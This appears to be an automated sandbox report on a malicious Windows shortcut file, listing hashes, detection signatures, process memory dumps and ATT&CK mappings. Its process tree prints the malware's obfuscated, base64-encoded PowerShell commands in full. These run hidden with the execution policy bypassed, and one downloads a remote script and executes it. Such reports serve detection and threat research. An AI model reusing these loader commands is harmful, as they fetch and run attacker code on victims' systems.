6d51b225bf9e61258f0a40274f0427d8b27a57f11d6a23b7371587b1d1fcde82

General

Target

tmpyl4tkeg5.lnk
Size

6.0MB
MD5

e4c11bee612af2f2f0d1361b098e456d
SHA1

6f781c365ee30354378c3a671694976c6931e0de
SHA256

6d51b225bf9e61258f0a40274f0427d8b27a57f11d6a23b7371587b1d1fcde82
SHA512

78bc40ad85bfdb510c3502ac2e15e44e8d15eed226452bc52a004e1fb82a93b95abcad199fd38da45d224176a8c86db29ee87421ece0ed03aeca5acecbcc5578
SSDEEP

384:9D0kk0QMlgiCvN0kkj1KcMz0kk3B0kk7WShStbMS7StxSPE0kkdsHZ:9D3kIlS3kj1Kce3kR3k7WwwMGOt3kdQ

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://wordpress.d

Signatures

Detect suspicious LNK files with LOLBins [1ZRR4H] 1 IoCs

resource	yara_rule
behavioral1/files/0x0008000000016d55-36.dat	LNK_sospechosos

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2736	powershell.exe
2736	powershell.exe
2736	powershell.exe
2692	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1848 wrote to memory of 2736	1848	cmd.exe	29
PID 1848 wrote to memory of 2736	1848	cmd.exe	29
PID 1848 wrote to memory of 2736	1848	cmd.exe	29
PID 2736 wrote to memory of 2692	2736	powershell.exe	30
PID 2736 wrote to memory of 2692	2736	powershell.exe	30
PID 2736 wrote to memory of 2692	2736	powershell.exe	30

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\tmpyl4tkeg5.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABzAGoAaQBqAHEAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFoAMABFADIAUQBVAFYARgBRAFYAVgAzAFEAawBSAEIAUgBXAHQAQgBVADEARgBCAGQAVQBGAEYAWQAwAEYAYQBVAFUASQB3AFEAVQBaAE4AUQBXAFIAQgBRAG4AbABCAFIAMgB0AEIAWQBtAGQAQwBiAGsARgBEAFoAMABGAFgAZAAwAEoAVQBRAFUAaAByAFEAVwBOADMAUQBqAEIAQgBSADEAVgBCAFkAbABGAEIAZABVAEYARgBUAFUARgBpAGQAMABKADEAUQBVAGgAWgBRAFYAcABSAFEAbgBsAEIAUwBGAEYAQgBXAEYARgBCAE4AawBGAEUAYgAwAEYAUwBaADAASgA1AFEAVQBjADQAUQBXAEoAUgBRAGsATgBCAFIAMABWAEIAWQAzAGQAQwBiAEUARgBFAFcAVQBGAE8AUQBVAEoAVQBRAFUAaABSAFEAVwBOAG4AUQBuAEIAQgBSAHoAUgBCAFcAbgBkAEIAYgAwAEYARABTAFUARgBhAFEAVQBKAFkAUQBVAFUAMABRAFUAMQBCAFEAbABwAEIAUgBtAE4AQgBZAFgAZABDAE0AVQBGAEgAVgBVAEYAVABRAFUASgB6AFEAVQBSAFoAUQBWAFIAQgBRAFgAbABCAFIAbQA5AEIAWQAwAEYAQwBhAFUARgBGAFkAMABGAFcAVQBVAEkAeQBRAFUAZABOAFEAVgBOAEIAUQBrADUAQgBTAEYAbABCAFcAbABGAEMAUwBFAEYARgBNAEUARgBrAGQAMABKAG8AUQBVAFoAbgBRAFYAcAAzAFEAagBGAEIAUgAwADEAQgBVADAARgBDAFQAawBGAEkAWgAwAEYASgBaADAARgB3AFEAVQBOAHIAUQBVADkAMwBRAFUAdABCAFEAMQBGAEIAWQBWAEYAQwBNAFUARgBJAGIAMABGAGkAUQBVAEoANgBRAFUAZABGAFEAVwBOAFIAUQBuAEYAQgBSAEQAQgBCAFYAMwBkAEMAVgBFAEYASQBhADAARgBqAGQAMABJAHcAUQBVAGQAVgBRAFcASgBSAFEAWABWAEIAUgBsAEYAQgBXAGwARgBDAE4ARQBGAEkAVQBVAEYATQBaADAASgBHAFEAVQBjADAAUQBWAGwAMwBRAG4AWgBCAFIAMQBGAEIAWQBWAEYAQwBkAFUARgBIAFkAMABGAFkAVQBVAEUAMgBRAFUAUgB2AFEAVgBGAFIAUQBsAFIAQgBSAFUAMQBCAFUAMQBGAEMAUwBrAEYARABOAEUARgBTAGQAMABKAHMAUQBVAGgAUgBRAFYAVgAzAFEAagBCAEIAUwBFAGwAQgBZAFYARgBDAGQAVQBGAEgAWQAwAEYATABRAFUASgBpAFEAVQBaAE4AUQBXAFYAUgBRAG4AcABCAFMARgBGAEIAVwBsAEYAQwBkAEUARgBEAE4ARQBGAFIAZAAwAEoAMgBRAFUAYwAwAFEAVwBSAG4AUQBtAHgAQgBTAEUAbABCAFoARQBGAEMAWgBFAEYARQBiADAARgBQAFoAMABKAEgAUQBVAGgASgBRAFcASgAzAFEAbgBSAEIAUgBVAGwAQgBXAFYARgBDAGUAawBGAEgAVgBVAEYATwBaADAARQB3AFEAVQBaAE4AUQBXAFIAQgBRAG4AbABCAFIAMgB0AEIAWQBtAGQAQwBiAGsARgBEAFoAMABGAEoAWgAwAEoAbwBRAFUAVgBuAFEAVgBWAG4AUQBYAGQAQgBSADAAMQBCAFUAMABGAEMAVABrAEYARQBXAFUARgBVAFEAVQBJADEAUQBVAFIAcgBRAFUAMQAzAFEAbQBsAEIAUgBFADEAQgBVADIAZABDAGMAawBGAEgAVABVAEYAVABRAFUASgBMAFEAVQBkADMAUQBWAGwAMwBRAFgAcABCAFIAVABCAEIAWgBGAEYAQwBZAFUARgBGAFIAVQBGAFEAVQBVAEUANQBRAFUATgBKAFEAVQB0AFIAUQBYAEIAQgBSAEgATgBCAFEAMgBkAEIAYQAwAEYASABUAFUARgBpAGQAMABKADEAUQBVAGgAUgBRAFYAcABSAFEAbgBWAEIAUwBGAEYAQgBTAFUARgBCAE8AVQBGAEQAUQBVAEYAVABVAFUASgAxAFEAVQBoAFoAUQBXAEoAMwBRAG4ASgBCAFIAMQBWAEIAVABGAEYAQwBXAEUARgBIAFYAVQBGAFoAWgAwAEoAVABRAFUAZABWAFEAVwBOAFIAUQBqAEYAQgBSADEAVgBCAFkAMwBkAEMATQBFAEYARABRAFUARgBNAFUAVQBKAFcAUQBVAGgASgBRAFcARgBSAFEAVwBkAEIAUQAyAGQAQgBTAGsARgBDAGMARQBGAEkAVgBVAEYAbABaADAASgB6AFEAVQBoAE4AUQBWAGwAUgBRAG4AaABCAFIAMgA5AEIAUwBVAEYAQgBjAGsARgBEAFEAVQBGAEsAUQBVAEoAeQBRAFUAYwB3AFEAVwBOAG4AUQBqAE4AQgBSAHoAUgBCAFkAawBGAEIAYwBFAEYARABRAFUARgBNAFUAVQBKAFcAUQBVAGgATgBRAFYAcABSAFEAawBOAEIAUgAwAFYAQgBZADMAZABDAGMARQBGAEgAVABVAEYAVgBRAFUASgBvAFEAVQBoAEoAUQBXAE4AMwBRAG4AQgBCAFIAegBSAEIAVwBuAGQAQgBTADAARgBGAGEAMABGAGkAWgAwAEkAeQBRAFUAYwA0AFEAVwBGADMAUQBtAHgAQgBRAHoAQgBCAFUAbABGAEMATgBFAEYASQBRAFUARgBqAFoAMABKAHMAUQBVAGgATgBRAFcATgAzAFEAbgBCAEIAUgB6AGgAQgBZAG0AZABCAFoAMABGAEQAVQBVAEYAWgBkADAASgAyAFEAVQBjADAAUQBXAFIAQgBRAG0AeABCAFIAegBSAEIAWgBFAEYAQgBkAFUARgBGAFQAVQBGAGkAZAAwAEoAMQBRAFUAaABSAFEAVgBwAFIAUQBuAFYAQgBTAEYARgBCAFEAMgBkAEIAUABRAD0APQAiACkAKQA7AAoAJABvAHYAawBrAGUAZgB1AGYAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEwAVQBWAHUAWQAyADkAawBaAFcAUgBEAGIAMgAxAHQAWQBXADUAawBJAEUAcABCAFEAbgBKAEIAUgB6AEIAQgBZADIAZABDAE0AMABGAEgATgBFAEYAaQBRAFUARQA1AFEAVQBaAHoAUQBWAFYAMwBRAGoAVgBCAFMARQAxAEIAWgBFAEYAQwBiAEUARgBIAE0ARQBGAE0AWgAwAEoAVgBRAFUAZABWAFEAVwBWAEIAUQBqAEIAQgBRAHoAUgBCAFUAbABGAEMAZABVAEYASABUAFUARgBpAGQAMABKAHIAUQBVAGQAcgBRAFcASgBuAFEAbQA1AEIAUgBqAEIAQgBUAHcAPQA9ACIAKQApADsACgAkAHYAcABqAGYAYwBrAGQAcgBhAGYAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFkAMwBWADAAYQBXADkAdQBVAEcAOQBzAGEAVwBOADUASQBHAEoANQBjAEcARgB6AGMAdwA9AD0AIgApACkAOwAKACQAeABwAGsAaABmAG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEwAVQBWADQAWgBRAD0APQAiACkAKQA7AAoAJABnAGcAcQBkAG8AaQBzAGsAcwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABWAGQAcABiAG0AUgB2AGQAMQBOADAAZQBXAHgAbABJAEcAaABwAFoARwBSAGwAYgBnAD0APQAiACkAKQA7AAoAJAB4AHgAcgB4AGIAagBhAGQAdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAIgApACkAOwAKACQAawBpAHMAYgBiAHMAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABVADUAdgBVAEgASgB2AFoAbQBsAHMAWgBRAD0APQAiACkAKQA7AAoAJAB6AG8AeQBmAGYAawA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAIgApACkAOwAKACQAbwB3AHIAYgBoAGMAYwBiAHAAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABVADUAdgBUAEcAOQBuAGIAdwA9AD0AIgApACkAOwAKACQAcgBzAHoAZQBkAHUAdQB0AHEAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiACIAKQApADsACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAKAHsACgAJAHQAcgB5AAoACQB7AAoACQAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnACAALQBWAGUAcgBiACAAcgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAKAAkAHIAcwB6AGUAZAB1AHUAdABxACAAKwAgACQAbwB3AHIAYgBoAGMAYwBiAHAAcgApACwAIAAoACQAegBvAHkAZgBmAGsAIAArACAAJABrAGkAcwBiAGIAcwBiACkALAAgACgAJAB4AHgAcgB4AGIAagBhAGQAdgAgACsAIAAkAGcAZwBxAGQAbwBpAHMAawBzACkALAAgACgAJAB4AHAAawBoAGYAbgAgACsAIAAkAHYAcABqAGYAYwBrAGQAcgBhAGYAKQAsACAAKAAkAG8AdgBrAGsAZQBmAHUAZgAgACsAIAAkAHMAagBpAGoAcQApACkAOwAKAAkACQBlAHgAaQB0ADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkAfQAKAH0ACgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABrAG0AcgB3AG4AbAA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAZABXAE4AMABZAFcAawB1AGUASABsADYATAAyAFoAcABiAEcAVQB2AGMASABNAHYAZQBHAE0AdwBhAFgAZwB1AGMASABNAHgAIgApACkAOwAKACQAaQB1AHoAbABzAGEAcQBqAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAMwBiADMASgBrAGMASABKAGwAYwAzAE0AdQBaAEEAPQA9ACIAKQApADsACgAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACgAJABpAHUAegBsAHMAYQBxAGoAIAArACAAJABrAG0AcgB3AG4AbAApACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAEMAbwBuAHQAZQBuAHQACgA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpyl4tkeg5.lnk

Filesize
15KB

MD5
b58d2964ecc2cd074a70dd75a9676402

SHA1
e8a0e58252cffabad9e23db50a8bc31a0d12fbd1

SHA256
7b6e68ebe8193e23fc308c85eec8cd15532548ef071a68c8b973606aec36311a

SHA512
f49e45b34ad23eb74e095add99e7abd3e501517fd899e453ff67320f8d39ad52e0ec8e45c52d852118490e87eb4fa8115340d275634ddd7fa2da26e79304706c

Download Submit
memory/2692-55-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

Filesize
9.6MB

Download
memory/2692-60-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

Filesize
9.6MB

Download
memory/2692-59-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2692-58-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2692-57-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

Filesize
9.6MB

Download
memory/2692-56-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2736-45-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2736-49-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2736-50-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-47-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2736-48-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2736-46-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-44-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/2736-43-0x000007FEF5D10000-0x000007FEF66AD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-42-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing